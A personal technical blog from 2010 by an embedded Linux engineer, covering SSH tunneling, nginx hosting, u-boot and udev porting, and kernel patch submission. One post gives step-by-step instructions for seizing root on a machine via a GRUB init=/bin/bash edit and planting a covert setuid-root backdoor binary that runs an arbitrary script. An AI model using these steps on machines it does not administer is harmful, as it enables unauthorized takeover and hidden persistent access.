Tuesday, December 14, 2010

ssh tunneling is powerful

To work from home, we have to use a "svi" service, with dynamic changing password and ssh to a dedicated company server. It's a bit inconvenience at the beginning, until I found the power of ssh tunneling.


In short, if you have ssh connection, you may setup localforward and then your ssh server is working like a proxy to access the other network.


As we have proxy server to access company intranet, I can then setup my local proxy script to use the proxy if I need to access intranet, and no proxy to access other internet.


For example, my .ssh/config file.

Host svi0
HostName svi_server_name
User your_user_id

LocalForward 2001 internal_host_1:22
LocalForward 2002 internal_host_2:22

Host svi1
HostName localhost
Port 2001
User your_user_id
LocalForward 3128 proxy_server:3128

Host svi2
HostName localhost
Port 2001
User your_user_id

Host svi2
HostName localhost
Port 2002
User your_user_id



Then you can just do "ssh -f svi0 -N".

The tunnel is established.


Then "ssh svi1", you may login to internal_host_1 using your own password, instead of the one-time password.



The proxy script: myproxy.pac. You need to set your proxy manually in the browser.

function FindProxyForURL(url, host) {
   if (isPlainHostName(host) ||
      dnsDomainIs(host, "intranet_domain1") ||
      dnsDomainIs(host, "intranet_domain2") || 
      isInNet(host, "intranet_ip_addr", "255.255.255.255")) {
      return "PROXY localhost:3128"; }
   else
      return "DIRECT";
}


In this case, I have a very similar Linux working environment at home as I have in company.

Sunday, December 12, 2010

web hosting with nginx and Amazon EC2

I am doing some test recently on using Amazon's EC2 for website hosting. The EC2 is a cloud service offered by Amazon. You have total control, ie, root access to the virtual server hosted by Amazon. Their current promotion can give you free use for the first year. That's why I decided to do a trial. Even after the 1st year, if you buy reserved instance from Amazon, it is not expensive compared to other virtual dedicated server plan offered by companies such as godaddy.

I am also using nginx as my web server. It is a very powerful and fast web server, faster and simpler than apache. I used fastcgi to handle my php script. Right now, all my websites are hosted with a new virtual dedicated server from godaddy, using nginx. I haven't yet tested perl support.

Most of my website is using wordpress framework. I've learned the basic configuration using "try_files" to replace the rewrite rules required by wordpress.

The following is an example of my configuration for a virtual host.

server {
    listen       80;
    server_name  example.com;

    error_log /var/log/nginx/example.error.log error;
    access_log  /var/log/nginx/example.access.log  main;

    root   /var/www/example;
    index  index.php;
    try_files $uri $uri/ /index.php;

    location ~ \.php$ {
 include    /etc/nginx/fastcgi.conf;
        fastcgi_pass   127.0.0.1:9000;
    }
}

Tuesday, November 09, 2010

procmail, Catalyst, and DBIx

Stuff I am working on recently.

Procmail

Learned to use procmail to filter my emails. I used procmail and wrote some rules. My recent activity was to create a perl script to do special action once an email is received. This can be greatly helpful to create trigger system for our infrastructure.

A great glue for various tools.

Catalyst

I am learning Catalyst, the MVC based Perl framework for website. It is powerful, but the initial learning curve could be huge. Anyway, I've learned to use the Schema and recordset to generate customized query.

DBIx

I learned DBIx when I was learning Catalyst. However, I used it in my other scripts, to share the same Schema created for the database. It is a new way of working with database, and I like it.

Misc

Some cool tools I am using recently
* ack: a great alternative of "grep".
* pv: display progress in the data pipe.

Friday, October 22, 2010

regex

I had an interesting regular expression problem this week.

The problem we are trying to solve is simple: to find out the root directory for a software repository.

The assumption of the problem is that all the repository contains a directory like "foo" or "bbb". So, given a full path, we need to find out the parent directory of "foo", or "bbb". For example, the given directory is "/home/myhome/test/foo/dir1/deb", so it should return "/home/myhome/test" as the root directory of the repository. Another example, "/home/myhome/ttt/bbb/test", should return "/home/myhome/ttt".

Our original regex to match the root directory is pretty simple, like

/(.*)\/foo/

/(.*)\/bbb/

we match the input twice. The first one first and then the second one.

However, we are getting error in a case like "/home/myhome/football/bbb". It returns "/home/myhome", while "/home/myhome/football" should be returned.

Then I tried to use /(.*)\/foo\// to match the path. This new one works for the a.m. test cases, but will fail when the input is "/home/myhome/football/foo".

My final solution is simple, just append a "/" at the end of the input and use /(.*)\/foo\// to match the path. After that, just remove the trailing "/".

The solution itself is not hard. But it took me sometime to come up with the solution, as I didn't think of changing the input a little bit for a match. I could use more condition statements to check the input. However, the final regex is simpler and beautiful.

Sometimes, you just have to jump out of the regular solution. The beauty and simplicity of the code should be our goal.

Wednesday, September 22, 2010

Linux Kernel Submission

I think it is time to summarize my experience in the submission of bcmring architecture into the linux kernel.

You may find my contribution to the kernel 2.6.32 in the following page. Noted Broadcom ranked No. 4 by lines of changes. Mostly by me. :-)
Linux Kernel Development Statistics

1) subscribe to the arm-linux-kernel mailing list
2) send out your first email asking about other people's attitude about submit a driver/architecture
3) prepare your own git tree, better start with the latest git tree
4) port your core code into the git tree, put only the core code and the minimal amount of drivers to start, like core, dma, serial.
5) change the kernel makefile and Kconfig file to support your architecture
6) prepare a arch_defconfig configuration file, this is used to regression test the build of your architecture
7) split your patches into small chunk
8) run Lindent to make sure there is no errors nor warnings. A lot of kernel developers are picky, you'd prepared to reformat your code, rename the variables as much as possible
9) try a submission, with detailed explanation and message
10) be patient
11) get feedback and prepare another set of submission
12) ask for feedback once a week and push to get feedback, until nobody complain about your code
13) repeat until your code is merged

Thursday, September 02, 2010

badly punctuated parameter list

I've encountered some strange problem like

"badly punctuated parameter list" in macro definition for C when I was compiling perl modules on Solaris platform. After my research, I found that it is due to ancient gcc, like 2.81 can't process the following macro definition.

#define my_snprintf(buffer, len, ...) snprintf(buffer, len, __VA_ARGS__)

You have to change it to a more compatible form like the following.

#define my_snprintf(buffer, len, ARGS...) snprintf(buffer, len, ##ARGS)

Friday, July 16, 2010

hidden arguments, easter egg, or what?

I just learned today that there is a hidden argument of 'date' command under Linux.

It is 'date --iso=seconds', which is equivalent to 'date +%FT%T%z' command.

The '--iso=seconds' argument is not recorded in the manual nor usage help.   However, it is not supported in Solaris. So, I fixed a script problem today by replacing the non-standard --iso=seconds argument with the +%FT%T%z argument for date.

I found another hidden argument of the 'cov-maintain-db' command in coverity prevent 4.5.  You may use 'cov-maintain-db --raw-db' command to open a 'sqlite' shell on the coverity database. However, AFAIK, coverity is moving to postgre sql database in their latest release.  So, this hidden argument becomes useless.

In my 10 years experiences in computing industry, it's funny to know that there are actually so many un-documented command, arguments, or APIs everywhere. It's the easter egg and trick of the IT industry.  It's so universal and it seems everyone, every company is fond of doing this, as a demonstration of their power over end users. :-)

That's why I like open source software.  You may dig into the source code to uncover many hidden or un-official stuffs.

--
Hao Leo Chen
http://leochen.net

Friday, June 25, 2010

coverity

I am recently working on the Coverity Prevent product, which is a static source code analysis tool to identify possible bugs in the source code.  The tool is pretty cool, originally developed in Stanford University. It's gaining a lot of momentum recently with mature products and backed by VC.  Looks like many big companies are jumping onto the board of Coverity.  It's a promising tool.  But I think the final fate of the company or the best deal would be sold to big software companies like Microsoft or Symantec.  Anyway, it's a good tool and I am the administrator of the tool in my department of Ericsson Canada.


--
Hao Leo Chen
http://leochen.net

Friday, June 18, 2010

How to hack the Linux box to get root permission

You have a Linux box with you, but you have only a normal user account.  You want to hack this box and get root permission.  Now, you have a solution.

Note. the following procedure works only when you use Grub boot loader. Never tested with Lilo.

1. reboot your machine
2. before boot to Linux, press some key to bring up your boot loader interface
3. press "e" to edit your boot loader line, in Grub
4. add "init=/bin/bash", or "init=/bin/sh" to the end of your booting line
5. press Enter and then press "b" to boot
6. your system booted and you are root now, without login
7. Bingo.  You can hijack the system now. :-)
8. To be a good citizen, I would recommend to add  your own user id into the /etc/sudoers file, by using "visudo" command.
you can "sudo bash" to get a shell with root permission.  You don't know the root password yet, but you can get the root permission. But this way, the root will know it's you who hacked the system by checking the "/etc/sudoers" file.
9. To do something more secret, you can get a suid program executing your script as root.

I have got a C program, you may build it and set the suid.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
   setuid(0);
   system("/tmp/myscript.sh");

   return 0;
}

10. save the program as t.c
11. gcc -o go t.c
12. chmod 4755 go

Now, you can put anything you want in /tmp/myscript.sh and run go. The /tmp/myscript.sh will be executed as root by go. Wow!

Don't do anything stupid to get  yourself into trouble. Just a demonstration of some hacking technique on Linux system.

Wednesday, May 19, 2010

mutt, fetchmail, procmail, and mini_sendmail

In recent days, I've managed to setup mutt, together with fetchmail, procmail, and mini_sendmail in my working environment.

Mutt is my favorite MUA, mail user agent, due to it's simplicity, speed and powerful configuration.
Fetchmail is used to grab mails from pop/imap server and deliver the mails to local directory.
Procmail is used to classify the mails received, based on very flexible regex based rules and actions which are script-able.
mini_sendmail is used as the MTA to contact the SMTP server, for sending email for mutt, if your system's sendmail is not configured as smart host.

The setup of my environment.

Fetchmail's configuration for IMAP server

Procmail's configuration

Mutt configuration

Saturday, April 24, 2010

Wordpress vs. Drupal

I recently installed wordpress and drupal on my two websites.
Wordpress on http://alrishachen.com
Drupal on http://alrisha.ca

I'd compare those two popular CMS based on my own experience.

* installation. Both are easy to install/deploy on your hosting server.  You just need to untar the tarball and setup database, usually MySQL based on the document.  Then, you run the install page and input necessary data and you are done! I'd say wordpress is easier than drupal. The installation of wordpress is faster, with less to worry.

* administration. Once you installed the system, you'd login as the administrator and to configure your website and add contents.  As wordpress is generally regarded as a blog system, I used it for a blog.  The default administration interface of wordpress is both easy and powerful. Drupal is targeting a more generic website, thus, the administration is more complicated with a lot of settings.  It should be intimidating for a small website admin to learn to use Drupal.  But, I can see that Drupal provided more controls, especially role based user permission management.  I would say this point, they are even.  Although the wordpress interface is more intuitive for beginners.

* theme. Wordpress is a winner in terms of themes.  There are a lot of themes provided by the community for wordpress.  The preview of the themes looks good and it is easier to apply the themes.  On the other hand, the themes provided by Drupal seemed providing more control over the layout/block of the website to designers.  For admin like me, without too much designer background, I love the beautiful themes in wordpress.

* module/plugin. Both of them have a huge amount of modules/plugins available.  Modules for Wordpress are easy to install, but with FTP permission only.

* overall. I'd love to use wordpress for small website, especially blog like style websites.  Drupal seemed more flexible in configuring website and provided more controls. If you spend more time on website design and are willing to learn Drupal, you may choose Drupal.  If  you just need a quick website setup for a certain purpose, I'd recommend Wordpress.

Anyway, the comparison is based on my limited experience of using those two CMS and personal preference.  I may have some different opinion later on with more use and requirement.  I'd like to try other popular CMS as well, such as Joomla. More reviews may come later.

Tuesday, March 16, 2010

linking with multiple definition of functions

I had fixed a linking problem today. The problem was caused by multiple definitions of the same function name. The linker complains about the multiple definitions of the same function. The solution is to add "-z muldefs" to the LDFLAGS, so that the linker will accept multiple definitions and just link the function it encountered first into the final ELF file. This maybe dangerous, as your final image may be different if the linking order of the object files changed. So, be careful when you use this option. We used this option as we have defined some of our own stdio functions with the same name as the standard stdio functions. During the linking stage, they will give the multiple definition errors. We just need to place our own implementation of the stdio functions in front of the newlib stdio library.

A better solution was to rename our functions to different function names other than the stdio function names. In this case, it won't cause further confusion.

I finally found that I had fixed this problem with bcmring platform a year ago and I have to fix it for the bcmhana platform again. The engineer who ported the makefile to bcmhana didn't pay enough attention to this option.

Sunday, March 07, 2010

u-boot works now

I finally get u-boot working on our bcmring platform on Friday. I had the hunch on Thursday that the ATAG parameters were not set properly that kernel can't boot. I used JTAG to examine the memory where the ATAG paramters stored. By comparing the memory content set by the working boot2 loader and the u-boot, I found that the command line for kernel wasn't set at all in u-boot. It turns out to be a configuration error in the configuration header files. By setting the proper command line for kernel, I can finally boot the kernel by using u-boot. That's a big progress and I made the u-boot works in two weeks.

In doing this project, I got more understanding of the kernel booting procedure, the ATAG parameters, and u-boot itself. After discussing with my lead, the upcoming work for u-boot includes:

* deliver the changes into linux-c for u-boot support, with proper parameters and configurations.
* upgrade u-boot to the latest version and get it working on bcmring platform.
* port ethernet driver to u-boot, so that the network boot and network rootfs will be supported.
* if time permits, I may get u-boot or other bootloader working for bcmhana as well.

Thursday, March 04, 2010

u-boot again

I am still working the u-boot project. After I got the ARM realview ice debugger, my life is easier, but still tough. I traced the assembly code of Linux kernel and compare the execution of the same kernel booted by both boot2 and u-boot. As the boot2 can successfully boot the kernel image, I just need to make sure u-boot can get to the same state that u-boot created for the kernel.

I figured out the memory starting address configuration is not set to proper value in u-boot today, but checking the kernel parameters. However, after I modified the u-boot code, I still can't get through the same point in kernel image. Anyway, there is a problem to be fixed. I'd keep working on that tomorrow, by checking the memory set by boot2/uboot, before the kernel booted.

The Linux kernel needs some settings in ATAG. Those settings will be read by kernel during the boot stage. There are several ATAG parameters, like the memory starting address, size, command line, arch id, etc.

Wednesday, February 24, 2010

u-boot

I have been working on u-boot since last week. I need to port u-boot to our bcmring platform.

We have some example from another team of Broadcom to support u-boot on the 2153 platform, which has a similar ARM core with our bcmring platform.

I got the u-boot to build last week. Since this week, I learned to use JTAG to load the u-boot elf file into the memory of the platform after ddr initialization. I ported the UART driver and then the timer driver. Yesterday, I was able to boot to u-boot shell with JTAG. That's a good milestone.

Today, I studied our 1st boot loader (boot1) and the relation between the boot1 and boot2, the second stage boot loader. As I was trying to replace boot2 with u-boot, after I figured out the memory map of boot2, with the help of Darwin, I managed to load u-boot from boot1 and boot to u-boot shell without using JTAG. That's a big success. I can then work on the nand driver to get u-boot to boot our kernel.

The ethernet driver, sd/mmc support will be followed after the nand driver.

Wednesday, January 13, 2010

udev 150

I've successfully updated udev for our target from 142 to 150 versions. I've added three patches to fix the compile errors. Those patches are introduced because the kernel header used in our toolchain is older than the latest version, like the inotify_init1 system call is not available in our version of toolchain. I have to use the inotify_init system call instead.

Anyway, it works in my first attempt. The old 142 version was ported by an intern, with too much modification to the makefiles/configure scripts. Those patches are 90% of junk, I would say. Anyway, the newer version is more maintainable now.

Tuesday, January 12, 2010

udev

I've got udev working on our platform. It's initially ported by an intern, but it seemed not working before he left. The problem was due to the kernel configuration. Once I sorted out the proper kernel configuration, udevd started properly and it works. The ota also worked with the udev. The previous port of udev was udev 142 version, which is rather old. I am porting the 150 version to our system.